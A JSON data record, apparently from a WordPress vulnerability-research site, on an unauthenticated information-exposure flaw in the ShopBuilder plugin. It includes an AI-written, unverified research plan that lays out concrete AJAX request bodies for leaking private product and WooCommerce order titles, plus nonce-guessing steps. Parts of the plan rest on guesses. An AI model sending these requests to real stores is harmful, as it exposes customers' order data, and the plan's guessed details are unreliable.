[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fet2-X8hESAlZwGJxIrsCg1eR7F2D0STLlpSdto7YUUE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32372","shopbuilder-elementor-woocommerce-builder-addons-unauthenticated-information-exposure","ShopBuilder – Elementor WooCommerce Builder Addons \u003C= 3.2.4 - Unauthenticated Information Exposure","The ShopBuilder – WooCommerce Builder For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.4. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","shopbuilder",null,"\u003C=3.2.4","3.2.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-02-18 00:00:00","2026-05-05 14:26:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0e363267-0b15-46e8-a112-d24dd6b8a22e?source=api-prod",77,[22,23,24,25,26,27,28,29],"README.txt","app\u002FAI\u002FDB\u002FAIDB.php","app\u002FControllers\u002FAdmin\u002FAjax\u002FModalTemplate.php","app\u002FControllers\u002FBuilder\u002FBuilderCpt.php","app\u002FControllers\u002FBuilderController.php","app\u002FControllers\u002FFrontend\u002FAjax\u002FUpdateCheckoutSection.php","app\u002FControllers\u002FSupportController.php","app\u002FElementor\u002FWidgets\u002FSingle\u002FProductAddToCart.php","researched",false,3,"# Research Plan: CVE-2026-32372 Information Exposure in ShopBuilder\n\n## 1. Vulnerability Summary\nThe **ShopBuilder – Elementor WooCommerce Builder Addons** plugin (versions \u003C= 3.2.4) is vulnerable to **Unauthenticated Information Exposure**. The vulnerability stems from AJAX handlers that are registered for both authenticated and unauthenticated users (`wp_ajax_nopriv_`) which lack proper capability checks or post-status restrictions. This allows an attacker to query for and retrieve titles\u002Fdata of sensitive post types, such as WooCommerce orders, private products, and internal templates.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Actions:** \n    - `rtsb_select2_object_search`\n    - `rtsb_select2_get_title`\n- **Vulnerable Parameters:** `post_type`, `q` (search term), and `id` (for get_title).\n- **Authentication:** Unauthenticated (via `wp_ajax_nopriv_` hooks).\n- **Preconditions:** The plugin must be active. WooCommerce must be active for maximum impact (leaking orders).\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a POST or GET request to `admin-ajax.php` with the action `rtsb_select2_object_search`.\n2.  **Hook Registration:** In `app\u002FControllers\u002FBuilderController.php`, the following hooks are registered:\n    ```php\n    add_action( 'wp_ajax_rtsb_select2_object_search', [ $this, 'select2_ajax_posts_filter_autocomplete' ] );\n    add_action( 'wp_ajax_nopriv_rtsb_select2_object_search', [ $this, 'select2_ajax_posts_filter_autocomplete' ] );\n    add_action( 'wp_ajax_rtsb_select2_get_title', [ $this, 'select2_ajax_get_posts_value_titles' ] );\n    add_action( 'wp_ajax_nopriv_rtsb_select2_get_title', [ $this, 'select2_ajax_get_posts_value_titles' ] );\n    ```\n3.  **Handler Execution:** The `select2_ajax_posts_filter_autocomplete` method (invoked by `nopriv_rtsb_select2_object_search`) processes user-supplied parameters.\n4.  **Information Leak:** The handler typically performs a `WP_Query` based on the `post_type` and `q` parameters. If it fails to restrict the `post_status` to `publish` or verify the user's capability to read the requested `post_type`, it returns titles and IDs of private or restricted content.\n\n## 4. Nonce Acquisition Strategy\nWhile many search-related AJAX handlers in Elementor add-ons omit nonce checks to improve performance and compatibility with caching, we should prepare to acquire one if required.\n\n1.  **Identify Trigger:** The `rtsb_select2_object_search` is likely used by the \"WooCommerce AJAX Product Filter Widget\" or \"Checkout Fields Editor\" modules mentioned in the `README.txt`.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Search Test\" --post_status=publish --post_content='[shopbuilder_ajax_filter]' \n    # Note: If shortcode name is unknown, use a generic WooCommerce shop page.\n    ```\n3.  **Extract Nonce:** ShopBuilder likely localizes its settings. Use `browser_eval` to look for nonces in the global scope:\n    - Variable Guess: `window.rtsb_params?.nonce`\n    - Variable Guess: `window.shopbuilder_data?.nonce`\n    - Variable Guess: `window.rtsb_select2_nonce`\n\n*Note: If the `nopriv` registration was intentional for frontend filters, the nonce is likely public.*\n\n## 5. Exploitation Strategy\nWe will attempt to leak the title of a WooCommerce Order and a Private Product.\n\n### Step 1: Discover Search Endpoint\nSend an unauthenticated request to the search action to determine if it responds without a nonce.\n\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** `action=rtsb_select2_object_search&q=secret&post_type=any`\n\n### Step 2: Target Sensitive Data\nIf the previous request succeeds, target WooCommerce orders. Orders often contain the customer's name in the title.\n\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:** `action=rtsb_select2_object_search&q=Order&post_type=shop_order`\n\n### Step 3: Leak Titles by ID\nUse the `rtsb_select2_get_title` action to retrieve the title of a specific known ID.\n\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:** `action=rtsb_select2_get_title&id=ID_OF_PRIVATE_POST`\n\n## 6. Test Data Setup\nPerform the following via WP-CLI to create content to leak:\n1.  **Create a Private Product:**\n    ```bash\n    wp post create --post_type=product --post_title=\"SECRET_VULN_PRODUCT\" --post_status=private\n    ```\n2.  **Create a WooCommerce Order:**\n    ```bash\n    wp post create --post_type=shop_order --post_title=\"CONFIDENTIAL_ORDER_DOE\" --post_status=wc-processing\n    ```\n3.  **Identify IDs:** Note the IDs returned by the above commands for use in Step 3 of the exploitation.\n\n## 7. Expected Results\n- A successful exploit of `rtsb_select2_object_search` will return a JSON object containing an array (e.g., `results` or `data`) where the `text` or `title` property matches `\"SECRET_VULN_PRODUCT\"` or `\"CONFIDENTIAL_ORDER_DOE\"`.\n- A successful exploit of `rtsb_select2_get_title` will return the string or JSON containing the exact title of the post ID provided, regardless of its private status.\n\n## 8. Verification Steps\n1.  **Capture Response:** Verify the HTTP response body contains the string `SECRET_VULN_PRODUCT`.\n2.  **Confirm Status:** Use WP-CLI to confirm that the post is indeed private:\n    ```bash\n    wp post get \u003CID> --field=post_status\n    ```\n    If the status is `private` but the title was returned to an unauthenticated user, the exposure is confirmed.\n\n## 9. Alternative Approaches\nIf `post_type=any` is blocked, try specific internal post types:\n- `shop_order` (WooCommerce Orders)\n- `rtsb_builder` (The plugin's own templates - may contain configuration data)\n- `wp_template` (FSE templates)\n- `customize_changeset` (Drafted site changes)\n\nIf a nonce is strictly required and not found on the frontend, check if `check_ajax_referer` is called with `$die = false` in the controller:\n```php\n\u002F\u002F Inferred pattern to check for\ncheck_ajax_referer( 'rtsb_nonce', 'nonce', false );\n\u002F\u002F If result is not checked, the exploit still works with a dummy nonce.\n```","The ShopBuilder plugin for WordPress is vulnerable to unauthenticated sensitive information exposure due to AJAX handlers that lack proper authorization checks. Attackers can exploit these handlers to search for and retrieve the titles of restricted post types, including WooCommerce orders and private products, potentially leaking customer names and internal site configurations.","\u002F\u002F app\u002FControllers\u002FBuilderController.php (around line 111)\n\n\u002F\u002F RT Select2 Ajax.\nadd_action( 'wp_ajax_rtsb_select2_object_search', [ $this, 'select2_ajax_posts_filter_autocomplete' ] );\nadd_action( 'wp_ajax_nopriv_rtsb_select2_object_search', [ $this, 'select2_ajax_posts_filter_autocomplete' ] );\n\u002F\u002F Select2 ajax save data.\nadd_action( 'wp_ajax_rtsb_select2_get_title', [ $this, 'select2_ajax_get_posts_value_titles' ] );\nadd_action( 'wp_ajax_nopriv_rtsb_select2_get_title', [ $this, 'select2_ajax_get_posts_value_titles' ] );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.4\u002Fapp\u002FAI\u002FDB\u002FAIDB.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.5\u002Fapp\u002FAI\u002FDB\u002FAIDB.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.4\u002Fapp\u002FAI\u002FDB\u002FAIDB.php\t2026-01-22 09:39:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.5\u002Fapp\u002FAI\u002FDB\u002FAIDB.php\t2026-02-17 06:32:52.000000000 +0000\n@@ -106,7 +106,7 @@\n \t\t\t\u002F\u002F Insert new record.\n \t\t\t$data['product_id'] = absint( $product_id );\n \t\t\t$data['created_at'] = current_time( 'mysql' );\n-\t\t\tFns::DB()::insert( AIFns::$ai_embeddings_table, [ $data ] );\n+\t\t\tFns::DB()::insert( AIFns::$ai_embeddings_table, [ $data ] )->execute();\n \t\t\treturn true;\n \t\t}\n \t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.4\u002Fapp\u002FControllers\u002FAdmin\u002FAjax\u002FModalTemplate.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.5\u002Fapp\u002FControllers\u002FAdmin\u002FAjax\u002FModalTemplate.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.4\u002Fapp\u002FControllers\u002FAdmin\u002FAjax\u002FModalTemplate.php\t2026-01-22 09:39:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.5\u002Fapp\u002FControllers\u002FAdmin\u002FAjax\u002FModalTemplate.php\t2026-02-17 06:32:52.000000000 +0000\n@@ -376,6 +376,10 @@\n \t\t\t\t\t\t$set_default     = BuilderFns::get_specific_category_as_default( $post_id );\n \t\t\t\t\t\tif ( ! empty( $categories_name ) && $set_default ) {\n \t\t\t\t\t\t\t$template_default = $post_id;\n+\t\t\t\t\t\t} else {\n+\t\t\t\t\t\t\t$option_name    = BuilderFns::option_name( $template_type );\n+\t\t\t\t\t\t\t$is_set_default = TemplateSettings::instance()->get_option( $option_name );\n+\t\t\t\t\t\t\t$set_default    = $is_set_default;\n \t\t\t\t\t\t}\n \t\t\t\t\t\tif ( ! $set_default && $template_default === $post_id ) {\n \t\t\t\t\t\t\t$template_default = '';\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.4\u002Fapp\u002FControllers\u002FBuilder\u002FBuilderCpt.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.5\u002Fapp\u002FControllers\u002FBuilder\u002FBuilderCpt.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.4\u002Fapp\u002FControllers\u002FBuilder\u002FBuilderCpt.php\t2026-01-22 09:39:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshopbuilder\u002F3.2.5\u002Fapp\u002FControllers\u002FBuilder\u002FBuilderCpt.php\t2026-02-17 06:32:52.000000000 +0000\n@@ -276,6 +276,10 @@\n \t\t\t\t\tif ( ! empty( $categories_name ) && $set_default ) {\n \t\t\t\t\t\t$is_set_default = $post_id;\n \t\t\t\t\t\t$page_type_for  = 'template-' . $post_id . '-specific-category';\n+\t\t\t\t\t} else {\n+\t\t\t\t\t\t$option_name    = BuilderFns::option_name( $template_type );\n+\t\t\t\t\t\t$is_set_default = TemplateSettings::instance()->get_option( $option_name );\n+\t\t\t\t\t\t$set_default    = $is_set_default;\n \t\t\t\t\t}\n \t\t\t\t\tif ( ! $set_default && $is_set_default === $post_id ) {\n \t\t\t\t\t\t$is_set_default = '';\n... (truncated)","An unauthenticated attacker can query sensitive data by sending an AJAX request to \u002Fwp-admin\u002Fadmin-ajax.php. By setting the 'action' parameter to 'rtsb_select2_object_search' and specifying 'post_type=shop_order', the attacker can use the 'q' parameter to search for strings (e.g., 'Order'). The plugin's handler will return a JSON list of post IDs and titles matching the search, even for private posts or orders. Alternatively, 'rtsb_select2_get_title' can be used with a specific 'id' to retrieve the title of any post directly. No nonce or authentication is required in vulnerable versions.","gemini-3-flash-preview","2026-05-20 22:32:20","2026-05-20 22:33:03",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshopbuilder\u002Ftags\u002F3.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshopbuilder.3.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshopbuilder\u002Ftags\u002F3.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshopbuilder.3.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshopbuilder\u002Ftags"]